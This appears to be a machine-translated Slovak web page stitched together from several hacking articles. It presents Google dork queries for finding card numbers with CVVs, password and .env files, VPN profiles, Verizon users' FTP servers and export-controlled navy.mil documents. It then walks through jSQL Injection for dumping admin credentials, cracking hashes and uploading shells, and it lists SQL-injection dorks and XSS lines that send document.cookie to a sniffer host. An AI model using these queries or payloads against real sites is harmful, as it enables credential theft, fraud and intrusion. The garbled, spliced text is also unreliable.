Návod na používanie jSQL Injection, multifunkčného nástroja na vyhľadávanie a využívanie SQL injekcií v Kali Linuxe. Pomocou málo známych funkcií Google nájdete požadované php id komentára Inurl

Pre každého operátora existuje odľahčená verzia s kratším názvom (bez predpony all). Rozdiel je v tom, že allinurl nájde odkazy so všetkými slovami a inurl nájde odkazy iba s prvým z nich. Druhé a ďalšie slová z dopytu sa môžu objaviť kdekoľvek na webových stránkach. Operátor inurl sa tiež líši od iného operátora s podobným významom – site. Prvý tiež umožňuje nájsť ľubovoľnú sekvenciu znakov v odkaze na hľadaný dokument (napríklad /cgi-bin/), čo sa široko používa na nájdenie komponentov so známymi zraniteľnosťami.

Skúsme to v praxi. Vezmeme allintextový filter a zo žiadosti vytvoríme zoznam čísel a overovacích kódov kreditných kariet, ktorých platnosť vyprší až o dva roky (alebo keď ich majiteľov omrzí kŕmiť všetkých).

Allintext: číslo karty dátum vypršania platnosti /2017 cvv

Keď sa v správach dočítate, že sa mladý hacker „nabúral na servery“ Pentagonu alebo NASA, pričom kradol utajované informácie, vo väčšine prípadov hovoríme práve o takejto základnej technike používania Google. Predpokladajme, že nás zaujíma zoznam zamestnancov NASA a ich kontaktné informácie. Takýto zoznam je určite dostupný aj v elektronickej podobe. Pre pohodlie alebo kvôli prehliadnutiu môže byť aj na samotnej webovej stránke organizácie. Je logické, že v tomto prípade naň nebudú žiadne odkazy, keďže je určený na interné použitie. Aké slová môžu byť v takomto súbore? Minimálne - pole „adresa“. Testovanie všetkých týchto predpokladov je jednoduché.

Inurl:nasa.gov filetype:xlsx "adresa"

Takéto nálezy sú príjemnou záležitosťou. Skutočne solídny úlovok poskytuje detailnejšia znalosť operátorov Google pre webmasterov, samotnej Siete a zvláštností štruktúry hľadaného. Ak poznáte podrobnosti, môžete ľahko filtrovať výsledky a spresniť vlastnosti potrebných súborov, aby ste vo zvyšku získali skutočne cenné údaje. Je smiešne, že byrokracia tu prichádza na pomoc. Vytvára štandardné formulácie, ktoré sú vhodné na vyhľadávanie tajných informácií, ktoré náhodne unikli na internet.

Napríklad pečiatka vyhlásenia o distribúcii, ktorú vyžaduje ministerstvo obrany USA, znamená štandardizované obmedzenia distribúcie dokumentu. Písmeno A označuje verejné správy, v ktorých nie je nič tajné; B - určené len na interné použitie, C - prísne dôverné a tak ďalej až do F. Samostatne vyniká písmeno X, ktoré označuje obzvlášť cenné informácie predstavujúce štátne tajomstvo najvyššej úrovne. Nechajte tých, ktorí to majú robiť v službe, hľadajú takéto dokumenty a my sa obmedzíme na súbory s písmenom C. Podľa smernice DoDI 5230.24 je toto označenie priradené dokumentom obsahujúcim popis kritických technológií, ktoré spadajú pod kontrolu exportu . Takéto starostlivo chránené informácie môžete nájsť na stránkach najvyššej úrovne domény.mil, pridelenej americkej armáde.

"VÝKAZ DISTRIBÚCIE C" inurl:navy.mil

Je veľmi výhodné, že doména .mil obsahuje iba stránky Ministerstva obrany USA a jeho zmluvných organizácií. Výsledky vyhľadávania s obmedzením domény sú mimoriadne čisté a názvy hovoria samy za seba. Hľadanie ruských tajomstiev týmto spôsobom je prakticky zbytočné: v doménach.ru a.rf vládne chaos a názvy mnohých zbraňových systémov znejú ako botanické (PP „Kiparis“, samohybné delá „Akatsia“) alebo dokonca báječné ( TOS „Buratino“).

Pozorným preštudovaním akéhokoľvek dokumentu z lokality v doméne .mil môžete vidieť ďalšie značky na spresnenie vyhľadávania. Napríklad odkaz na exportné obmedzenia „Sec 2751“, ktorý je vhodný aj na vyhľadávanie zaujímavých technických informácií. Z času na čas je odstránený z oficiálnych stránok, kde sa kedysi objavil, takže ak nemôžete sledovať zaujímavý odkaz vo výsledkoch vyhľadávania, použite vyrovnávaciu pamäť Google (operátor vyrovnávacej pamäte) alebo stránku Internet Archive.

Okrem náhodne odtajnených vládnych dokumentov sa vo vyrovnávacej pamäti Google občas objavia aj odkazy na osobné súbory z Dropboxu a iných služieb na ukladanie údajov, ktoré vytvárajú „súkromné“ odkazy na verejne publikované údaje. Ešte horšie je to s alternatívnymi a domácimi službami. Napríklad nasledujúci dotaz nájde údaje pre všetkých zákazníkov spoločnosti Verizon, ktorí majú nainštalovaný server FTP a aktívne používajú svoj smerovač.

Allinurl:ftp:// verizon.net

Takýchto šikovných ľudí je teraz viac ako štyridsaťtisíc a na jar 2015 ich bolo oveľa viac. Namiesto Verizon.net môžete nahradiť meno ktoréhokoľvek známeho poskytovateľa a čím je slávnejší, tým väčší môže byť úlovok. Prostredníctvom vstavaného servera FTP môžete vidieť súbory na externom úložnom zariadení pripojenom k ​​smerovaču. Zvyčajne ide o NAS na prácu na diaľku, osobný cloud alebo nejaký druh sťahovania súborov typu peer-to-peer. Všetok obsah takýchto médií je indexovaný spoločnosťou Google a inými vyhľadávacími nástrojmi, takže k súborom uloženým na externých diskoch máte prístup prostredníctvom priameho odkazu.

Pred rozšírenou migráciou do cloudu vládli ako vzdialené úložisko jednoduché FTP servery, ktoré mali tiež veľa zraniteľností. Mnohé z nich sú aktuálne aj dnes. Napríklad populárny program WS_FTP Professional ukladá konfiguračné údaje, používateľské účty a heslá do súboru ws_ftp.ini. Je ľahké ho nájsť a prečítať, pretože všetky záznamy sú uložené v textovom formáte a heslá sú po minimálnom zmätku šifrované pomocou algoritmu Triple DES. Vo väčšine verzií stačí zahodiť prvý bajt.

Takéto heslá je ľahké dešifrovať pomocou nástroja WS_FTP Password Decryptor alebo bezplatnej webovej služby.

Keď hovoríme o hacknutí ľubovoľnej webovej stránky, zvyčajne majú na mysli získanie hesla z protokolov a záloh konfiguračných súborov CMS alebo aplikácií elektronického obchodu. Ak poznáte ich typickú štruktúru, môžete ľahko uviesť kľúčové slová. Riadky ako tie, ktoré sa nachádzajú v ws_ftp.ini, sú extrémne bežné. Napríklad v Drupale a PrestaShope je vždy identifikátor používateľa (UID) a príslušné heslo (pwd) a všetky informácie sú uložené v súboroch s príponou .inc. Môžete ich vyhľadať nasledovne:

"pwd=" "UID=" ext:inc

V konfiguračných súboroch serverov SQL sú mená používateľov a e-mailové adresy uložené ako čistý text a namiesto hesiel sú zapísané ich MD5 hash. Presne povedané, nie je možné ich dešifrovať, ale môžete nájsť zhodu medzi známymi pármi hash-heslo.

Stále existujú DBMS, ktoré ani nepoužívajú hashovanie hesiel. Konfiguračné súbory ktoréhokoľvek z nich je možné jednoducho zobraziť v prehliadači.

Intext:DB_PASSWORD filetype:env

S príchodom Windows serverov miesto konfiguračných súborov čiastočne zabral register. Presne rovnakým spôsobom môžete prehľadávať jeho vetvy, pričom ako typ súboru použijete reg. Napríklad takto:

Filetype:reg HKEY_CURRENT_USER "Heslo"=

Niekedy je možné dostať sa k utajovaným informáciám pomocou údajov, ktoré boli náhodne otvorené a dostali sa do pozornosti Googlu. Ideálnou možnosťou je nájsť si zoznam hesiel v nejakom bežnom formáte. Do textového súboru, wordového dokumentu alebo excelovskej tabuľky si informácie o účte môžu uložiť len zúfalci, no tých je vždy dosť.

Filetype:xls inurl:password

Na jednej strane existuje množstvo prostriedkov, ako takýmto incidentom predchádzať. Je potrebné špecifikovať adekvátne prístupové práva v htaccess, patchnúť CMS, nepoužívať ľavoruké skripty a zalepiť ostatné diery. Existuje aj súbor so zoznamom výnimiek robots.txt, ktorý vyhľadávacím nástrojom zakazuje indexovať súbory a adresáre v ňom uvedené. Na druhej strane, ak sa štruktúra robots.txt na niektorom serveri líši od štandardnej, hneď je jasné, čo sa na ňom snažia ukryť.

Zoznamu adresárov a súborov na ľubovoľnej stránke predchádza štandardný index. Keďže sa na účely služby musí objaviť v názve, má zmysel obmedziť jeho vyhľadávanie na operátora intitle. Zaujímavé veci sú v adresároch /admin/, /personal/, /etc/ a dokonca aj /secret/.

Relevancia je tu mimoriadne dôležitá: staré zraniteľnosti sa uzatvárajú veľmi pomaly, ale Google a jeho výsledky vyhľadávania sa neustále menia. Existuje dokonca rozdiel medzi filtrom „poslednej sekundy“ (&tbs=qdr:s na konci adresy URL požiadavky) a filtrom „v reálnom čase“ (&tbs=qdr:1).

Časový interval dátumu poslednej aktualizácie súboru implicitne uvádza aj Google. Cez grafické webové rozhranie si môžete vybrať jedno zo štandardných období (hodina, deň, týždeň atď.) alebo nastaviť rozsah dátumov, tento spôsob však nie je vhodný pre automatizáciu.

Podľa vzhľadu panela s adresou môžete len hádať o spôsobe, ako obmedziť výstup výsledkov pomocou konštrukcie &tbs=qdr:. Písmeno y za ním určuje hranicu jedného roka (&tbs=qdr:y), m zobrazuje výsledky za posledný mesiac, w - za týždeň, d - za posledný deň, h - za poslednú hodinu, n - za minútu a s - za daj mi sek. Najnovšie výsledky, ktoré spoločnosť Google práve oznámila, sa dajú nájsť pomocou filtra &tbs=qdr:1 .

Ak potrebujete napísať šikovný skript, bude užitočné vedieť, že rozsah dátumov sa v Google nastavuje v juliánskom formáte pomocou operátora daterange. Takto môžete napríklad nájsť zoznam PDF dokumentov so slovom dôverné, stiahnutý od 1. januára do 1. júla 2015.

Dôverný typ súboru: pdf rozsah dátumov: 2457024-2457205

Rozsah je uvedený vo formáte juliánskeho dátumu bez zohľadnenia zlomkovej časti. Ručný preklad z gregoriánskeho kalendára je nepohodlný. Jednoduchšie je použiť konvertor dátumu.

Okrem zadania ďalších operátorov vo vyhľadávacom dopyte ich možno odoslať priamo v tele odkazu. Napríklad špecifikácia filetype:pdf zodpovedá konštrukcii as_filetype=pdf . Vďaka tomu je pohodlné pýtať sa na akékoľvek vysvetlenie. Povedzme, že výstup výsledkov len z Honduraskej republiky je špecifikovaný pridaním konštrukcie cr=countryHN do URL vyhľadávania a len z mesta Bobruisk - gcs=Bobruisk. Kompletný zoznam nájdete v sekcii pre vývojárov.

Automatizačné nástroje Google sú navrhnuté tak, aby uľahčili život, no často prinášajú problémy. Napríklad mesto používateľa je určené IP adresou používateľa prostredníctvom WHOIS. Na základe týchto informácií Google nielen vyrovnáva záťaž medzi servermi, ale mení aj výsledky vyhľadávania. V závislosti od regiónu sa pre tú istú požiadavku zobrazia na prvej stránke rôzne výsledky a niektoré z nich môžu byť úplne skryté. Dvojpísmenový kód za direktívou gl=country vám pomôže cítiť sa ako kozmopolita a vyhľadávať informácie z ktorejkoľvek krajiny. Napríklad kód Holandska je NL, ale Vatikán a Severná Kórea nemajú v Google vlastný kód.

Výsledky vyhľadávania sú často neprehľadné aj po použití niekoľkých pokročilých filtrov. V tomto prípade je ľahké objasniť požiadavku pridaním niekoľkých výnimočných slov (pred každým z nich je umiestnené znamienko mínus). Napríklad bankovníctvo, mená a návody sa často používajú so slovom Osobné. Čistejšie výsledky vyhľadávania sa preto ukážu nie ako učebnicový príklad dopytu, ale spresnený:

Intitle:"Index /Personal/" -mená -náuka -banking

Sofistikovaný hacker sa vyznačuje tým, že si všetko potrebné zabezpečí sám. Napríklad VPN je pohodlná vec, ale buď drahá, alebo dočasná a s obmedzeniami. Prihlásiť sa na odber pre seba je príliš drahé. Je dobré, že existujú skupinové odbery a s pomocou Google je ľahké stať sa súčasťou skupiny. Ak to chcete urobiť, stačí nájsť konfiguračný súbor Cisco VPN, ktorý má dosť neštandardnú príponu PCF a rozpoznateľnú cestu: Program Files\Cisco Systems\VPN Client\Profiles. Jedna žiadosť a pripojíte sa napríklad k priateľskému tímu univerzity v Bonne.

Filetype:pcf vpn OR Group

Heslá sú uložené zašifrované, ale Maurice Massard už napísal program na ich dešifrovanie a poskytuje ho zadarmo cez thecampusgeeks.com.

Google vykonáva stovky rôznych typov útokov a penetračných testov. Existuje veľa možností, ktoré ovplyvňujú populárne programy, hlavné databázové formáty, početné zraniteľnosti PHP, cloudy atď. Ak budete presne vedieť, čo hľadáte, bude oveľa jednoduchšie nájsť potrebné informácie (najmä informácie, ktoré ste nechceli zverejniť). Zaujímavými nápadmi sa živí nielen Shodan, ale každá databáza indexovaných sieťových zdrojov!

Spustite stiahnutý súbor dvojitým kliknutím (potrebujete mať virtuálny stroj).

[Sekcia vo vývoji]

[Sekcia vo vývoji]

[Sekcia vo vývoji]

Práca s programom je mimoriadne jednoduchá. Stačí zadať adresu webovej stránky a stlačiť ENTER.

Nasledujúca snímka obrazovky ukazuje, že stránka je zraniteľná voči trom typom SQL injekcií (informácie o nich sú uvedené v pravom dolnom rohu). Kliknutím na názvy injekcií môžete prepínať použitú metódu:

Taktiež sa nám už zobrazili existujúce databázy.

Obsah každej tabuľky si môžete pozrieť:

Najzaujímavejšou vecou na tabuľkách sú zvyčajne poverenia správcu.

Ak máte šťastie a nájdete údaje správcu, je priskoro na radosť. Stále musíte nájsť admin panel, kam zadať tieto údaje.

Ak to chcete urobiť, prejdite na ďalšiu kartu. Tu nás privíta zoznam možných adries. Na kontrolu môžete vybrať jednu alebo viac stránok:

Pohodlie spočíva v tom, že nemusíte používať ďalšie programy.

Bohužiaľ, nie je veľa neopatrných programátorov, ktorí ukladajú heslá v čistom texte. Pomerne často v riadku hesla vidíme niečo ako

8743b52063cd84097a65d1633f5c74f5

Toto je hash. Môžete ho dešifrovať pomocou hrubej sily. A... jSQL Injection má vstavaný brute force.

Nepochybným pohodlím je, že nemusíte hľadať ďalšie programy. Existuje podpora pre mnohé z najpopulárnejších hashov.

Toto nie je najlepšia možnosť. Aby ste sa stali guruom v dekódovaní hashov, odporúča sa kniha „“ v ruštine.

Ale samozrejme, keď nie je po ruke iný program alebo nie je čas na štúdium, veľmi vhod príde jSQL Injection so vstavanou funkciou hrubej sily.

Existujú nastavenia: môžete nastaviť, ktoré znaky sú zahrnuté v hesle, rozsah dĺžky hesla.

Okrem operácií s databázami - ich čítanie a úprava, ak sa zistia injekcie SQL, možno vykonať nasledujúce operácie so súbormi:

• čítanie súborov na serveri
• nahrávanie nových súborov na server
• nahrávanie shellov na server

A to všetko je implementované v jSQL Injection!

Existujú obmedzenia - server SQL musí mať práva na súbory. Správcovia inteligentného systému ich majú vypnuté a nebudú môcť získať prístup k súborovému systému.

Prítomnosť privilégií k súborom sa kontroluje pomerne jednoducho. Prejdite na jednu zo záložiek (čítanie súborov, vytvorenie shellu, nahranie nového súboru) a skúste vykonať jednu zo zadaných operácií.

Ešte veľmi dôležitá poznámka – musíme poznať presnú absolútnu cestu k súboru, s ktorým budeme pracovať – inak nebude fungovať nič.

Pozrite si nasledujúcu snímku obrazovky:

Na akýkoľvek pokus o prácu so súborom dostaneme odpoveď: Žiadne privilégium FILE (žiadne privilégiá pre súbor). A tu sa nedá nič robiť.

Ak namiesto toho máte inú chybu:

Problém so zápisom do [názov_adresára]

To znamená, že ste nesprávne zadali absolútnu cestu, kam chcete súbor zapísať.

Aby ste uhádli absolútnu cestu, musíte aspoň poznať operačný systém, na ktorom server beží. Ak to chcete urobiť, prejdite na kartu Sieť.

Tento záznam (riadok Win64) nám dáva dôvod predpokladať, že ide o operačný systém Windows:

Keep-Alive: timeout=5, max=99 Server: Apache/2.4.17 (Win64) PHP/7.0.0RC6 Pripojenie: Keep-Alive Metóda: HTTP/1.1 200 OK Obsah-Dĺžka: 353 Dátum: Pia, 11. december 2015 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 Content-Type: text/html; znaková sada=UTF-8

Tu máme nejaký Unix (*BSD, Linux):

Transfer-Encoding: chunked Dátum: Pi, 11 Dec 2015 11:57:02 GMT Metóda: HTTP/1.1 200 OK Keep-Alive: timeout=3, max=100 Connection: keep-alive Content-Type: text/html X- Poháňané: PHP/5.3.29 Server: Apache/2.2.31 (Unix)

A tu máme CentOS:

Metóda: HTTP/1.1 200 OK Vyprší: štvrtok, 19. novembra 1981 08:52:00 GMT Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ Pripojenie: keep-alive X-Cache-Lookup: MISS z t1.hoster.ru:6666 Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS z t1.hoster.ru Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Date: Pi, 11 Dec 2015 12:08:54 GMT Transfer-Encoding: chunked Content-Type: text/html; charset=WINDOWS-1251

V systéme Windows je typický priečinok pre lokality C:\Server\data\htdocs\ . Ale v skutočnosti, ak niekto „uvažoval“ o vytvorení servera v systéme Windows, potom je veľmi pravdepodobné, že táto osoba nepočula nič o privilégiách. Preto by ste mali začať skúšať priamo z adresára C:/Windows/:

Ako vidíte, všetko prebehlo v poriadku na prvýkrát.

Ale samotné shelly jSQL Injection vyvolávajú v mojej mysli pochybnosti. Ak máte privilégiá k súborom, môžete jednoducho niečo nahrať pomocou webového rozhrania.

A dokonca aj táto funkcia je dostupná v jSQL Injection. Všetko je veľmi jednoduché - stiahnite si zoznam stránok (možno importovať zo súboru), vyberte tie, ktoré chcete skontrolovať, a kliknutím na príslušné tlačidlo spustite operáciu.

jSQL Injection je dobrý a výkonný nástroj na vyhľadávanie a následné použitie injekcií SQL, ktoré sa nachádzajú na webových stránkach. Jeho nesporné výhody: jednoduché použitie, vstavané súvisiace funkcie. jSQL Injection môže byť najlepším priateľom začiatočníka pri analýze webových stránok.

Medzi nedostatky by som poznamenal nemožnosť editácie databáz (aspoň ja som túto funkcionalitu nenašiel). Ako pri všetkých nástrojoch GUI, jednu z nevýhod tohto programu možno pripísať jeho nemožnosti použiť v skriptoch. Napriek tomu je v tomto programe možná aj určitá automatizácia - vďaka vstavanej funkcii hromadnej kontroly stránok.

Program jSQL Injection sa používa oveľa pohodlnejšie ako sqlmap. Ale sqlmap podporuje viac typov SQL injekcií, má možnosti pre prácu so súborovými firewallmi a niektoré ďalšie funkcie.

Zrátané a podčiarknuté: jSQL Injection je najlepší priateľ začínajúceho hackera.

Pomoc pre tento program v Kali Linux Encyklopédii nájdete na tejto stránke: http://kali.tools/?p=706

Rozhodol som sa trochu porozprávať o informačnej bezpečnosti. Článok bude užitočný pre začínajúcich programátorov a tých, ktorí sa práve začali zaoberať vývojom Frontendu. Aký je problém?

Mnoho začínajúcich vývojárov sa tak nechá uniesť písaním kódu, že úplne zabudne na bezpečnosť svojej práce. A čo je najdôležitejšie, zabúdajú na také zraniteľnosti, akými sú SQL a XXS dotazy. Tiež prichádzajú s jednoduchými heslami pre svoje administratívne panely a sú vystavené hrubej sile. Aké sú tieto útoky a ako sa im môžete vyhnúť?

SQL injection je najbežnejší typ útoku na databázu, ktorý sa vykonáva počas dotazu SQL pre konkrétny DBMS. Takýmito útokmi trpí mnoho ľudí a dokonca aj veľké spoločnosti. Dôvodom je chyba vývojára pri písaní databázy a striktne povedané SQL dotazov.

Útok SQL injection je možný z dôvodu nesprávneho spracovania vstupných údajov použitých v SQL dotazoch. Ak je útok hackera úspešný, riskujete stratu nielen obsahu databáz, ale aj hesiel a protokolov administratívneho panela. A tieto údaje budú stačiť na úplné ovládnutie stránky alebo na jej nezvratné úpravy.

Útok je možné úspešne reprodukovať v skriptoch napísaných v PHP, ASP, Perl a ďalších jazykoch. Úspešnosť takýchto útokov závisí viac od toho, aký DBMS sa používa a ako je implementovaný samotný skript. Na svete existuje veľa zraniteľných stránok pre SQL injekcie. Dá sa to ľahko overiť. Stačí zadať „dorks“ - to sú špeciálne dopyty na vyhľadávanie zraniteľných stránok. Tu sú niektoré z nich:

• inurl:index.php?id=
• inurl:trainers.php?id=
• inurl:buy.php?category=
• inurl:article.php?ID=
• inurl:play_old.php?id=
• inurl:declaration_more.php?decl_id=
• inurl:pageid=
• inurl:games.php?id=
• inurl:page.php?file=
• inurl:newsDetail.php?id=
• inurl:gallery.php?id=
• inurl:article.php?id=

Ako ich používať? Stačí ich zadať do vyhľadávača Google alebo Yandex. Vyhľadávač vám poskytne nielen zraniteľnú stránku, ale aj stránku o tejto zraniteľnosti. Tým sa však nezastavíme a uistíme sa, že stránka je skutočne zraniteľná. Stačí, ak za hodnotu „id=1“ vložíte jednu úvodzovku „“. Niečo také:

• inurl:games.php?id=1'

A stránka nám vypíše chybu o SQL dotaze. Čo náš hacker potrebuje ďalej?

A potom potrebuje práve tento odkaz na chybovú stránku. Potom práca na zraniteľnosti vo väčšine prípadov prebieha v distribúcii "Kali linux" s jej nástrojmi pre túto časť: zavedenie injekčného kódu a vykonanie potrebných operácií. Ako sa to stane, vám nemôžem povedať. Informácie o tom však nájdete na internete.

Tento typ útoku sa vykonáva na súbory cookie. Používatelia ich zase radi ukladajú. Prečo nie? Čo by sme bez nich robili? Koniec koncov, vďaka súborom cookie nemusíme stokrát zadávať heslo pre Vk.com alebo Mail.ru. A je málo tých, ktorí ich odmietajú. Na internete sa však pre hackerov často objavuje pravidlo: koeficient pohodlnosti je priamo úmerný koeficientu neistoty.

Na implementáciu XSS útoku potrebuje náš hacker znalosť JavaScriptu. Jazyk je na prvý pohľad veľmi jednoduchý a neškodný, pretože nemá prístup k počítačovým zdrojom. Hacker môže pracovať iba s JavaScriptom v prehliadači, ale to stačí. Koniec koncov, hlavnou vecou je zadať kód na webovú stránku.

Nebudem podrobne hovoriť o procese útoku. Poviem vám len základy a význam toho, ako sa to deje.

Hacker môže pridať kód JS do nejakého fóra alebo knihy návštev:

document.location.href =”http://192.168.1.7/sniff.php?test”

Skripty nás presmerujú na infikovanú stránku, kde sa vykoná kód: či už je to sniffer, nejaký druh úložiska alebo exploit, ktorý nejakým spôsobom ukradne naše cookies z vyrovnávacej pamäte.

Prečo JavaScript? Pretože JavaScript je skvelý pri spracovávaní webových požiadaviek a má prístup k súborom cookie. Ak nás ale náš skript zavedie na nejakú stránku, používateľ si to ľahko všimne. Tu hacker využíva prefíkanejšiu možnosť – jednoducho zadá kód do obrázka.

Img=nový obrázok();

Img.src=”http://192.168.1.7/sniff.php?”+document.cookie;

Jednoducho vytvoríme obrázok a priradíme mu náš skript ako adresu.

Ako sa pred tým všetkým chrániť? Je to veľmi jednoduché - neklikajte na podozrivé odkazy.

DoS (z anglického Denial of Service - odmietnutie služby) je hackerský útok na počítačový systém s cieľom spôsobiť jeho zlyhanie. Ide o vytvorenie podmienok, za ktorých bona fide používatelia systému nemajú prístup k poskytovaným systémovým prostriedkom (serverom), alebo je tento prístup sťažený. Zlyhanie systému môže byť tiež krokom k jeho prevzatiu, ak softvér v núdzovej situácii vyprodukuje akékoľvek kritické informácie: napríklad verziu, časť programového kódu atď. Najčastejšie je to však miera ekonomického tlaku: stratu jednoduchej služby, ktorá generuje príjem. Účty od poskytovateľa alebo opatrenia na zabránenie útoku výrazne zasiahli „cieľ“ vo vrecku V súčasnosti sú najpopulárnejšie útoky DoS a DDoS, pretože umožňujú zlyhať takmer akýkoľvek systém bez zanechania právne významného dôkazu.

Aký je rozdiel medzi útokom DoS a DDos?

DoS je útok navrhnutý premysleným spôsobom. Napríklad, ak server nekontroluje správnosť prichádzajúcich paketov, hacker môže zadať požiadavku, ktorej spracovanie bude trvať večnosť a nebude dostatok času procesora na prácu s inými pripojeniami. V súlade s tým bude klientom odmietnutá služba. Týmto spôsobom však nebude možné preťažiť alebo zakázať veľké známe stránky. Sú vyzbrojené pomerne širokými kanálmi a super výkonnými servermi, ktoré sa s takýmto preťažením bez problémov vyrovnajú.

DDoS je vlastne rovnaký útok ako DoS. Ale ak v DoS existuje jeden paket požiadaviek, potom v DDoS ich môžu byť stovky alebo viac. Dokonca aj supervýkonné servery nemusia byť schopné zvládnuť takéto preťaženie. Uvediem príklad.

DoS útok je, keď s niekým vediete rozhovor, ale potom príde nejaký nevychovaný človek a začne nahlas kričať. Je buď nemožné, alebo veľmi ťažké hovoriť. Riešenie: zavolajte ochranku, ktorá osobu upokojí a vyvedie z priestorov. DDoS útoky sú, keď sa dnu vrúti dav tisícov takýchto nevychovaných ľudí. V tomto prípade ochranka nebude môcť všetkých zviazať a odviesť.

DoS a DDoS sa vykonávajú z počítačov, takzvaných zombie. Ide o počítače používateľov napadnutých hackermi, ktorí ani len netušia, že ich počítač sa zúčastňuje útoku na akýkoľvek server.

Ako sa pred tým chrániť? Vo všeobecnosti v žiadnom prípade. Hackerovi však môžete veci skomplikovať. Aby ste to dosiahli, musíte si vybrať dobrý hosting s výkonnými servermi.

Vývojár môže prísť s množstvom systémov na ochranu pred útokmi, plne si prezrieť skripty, ktoré sme napísali, skontrolovať, či stránka neobsahuje zraniteľné miesta atď. Keď sa ale dostane k poslednému kroku rozloženia webu, a to keď si jednoducho nastaví heslo pre admin panel, na jednu vec môže zabudnúť. Heslo!

Dôrazne sa neodporúča nastaviť jednoduché heslo. Môže to byť 12345, 1114457, vasya111 atď. Neodporúča sa nastavovať heslá kratšie ako 10-11 znakov. V opačnom prípade môžete byť vystavení najčastejšiemu a nekomplikovanému útoku – Brute force.

Brute force je slovníkový útok na vyhľadávanie hesiel pomocou špeciálnych programov. Slovníky môžu byť rôzne: latinské, vyčíslenie podľa čísel, povedzme, do určitého rozsahu, zmiešané (latinka + čísla) a dokonca existujú slovníky s jedinečnými znakmi @#4$%&*~~`’”\ ? atď.

Samozrejme, tomuto typu útoku sa dá ľahko vyhnúť. Stačí si vymyslieť zložité heslo. Aj captcha vás môže zachrániť. Tiež, ak je vaša stránka vytvorená na CMS, veľa z nich zistí tento typ útoku a zablokuje IP. Vždy si musíte pamätať, že čím viac rôznych znakov je v hesle, tým ťažšie je uhádnuť.

Ako fungujú hackeri? Vo väčšine prípadov buď podozrievajú alebo poznajú časť hesla vopred. Je celkom logické predpokladať, že heslo používateľa určite nebude pozostávať z 3 alebo 5 znakov. Takéto heslá vedú k častému hackovaniu. V zásade hackeri berú rozsah 5 až 10 znakov a pridávajú niekoľko znakov, ktoré môžu vopred poznať. Ďalej sa vygenerujú heslá s požadovanými rozsahmi. Linuxová distribúcia Kali má dokonca programy pre takéto prípady. A voilá, útok už nebude trvať dlho, keďže objem slovníka už nie je taký veľký. Okrem toho môže hacker využiť silu grafickej karty. Niektoré z nich podporujú systém CUDA a rýchlosť vyhľadávania sa zvyšuje až 10-krát. A teraz vidíme, že útok takýmto jednoduchým spôsobom je celkom reálny. Nie sú to však len webové stránky, ktoré sú vystavené hrubej sile.

Vážení vývojári, nikdy nezabúdajte na systém informačnej bezpečnosti, pretože dnes veľa ľudí, vrátane štátov, trpí takýmito typmi útokov. Najväčšou zraniteľnosťou je predsa človek, ktorý sa vie vždy niekde rozptýliť alebo niečo prehliadnuť. Sme programátori, ale nie naprogramované stroje. Buďte vždy na pozore, pretože strata informácií môže mať vážne následky!

Môže byť užitočné prečítať si: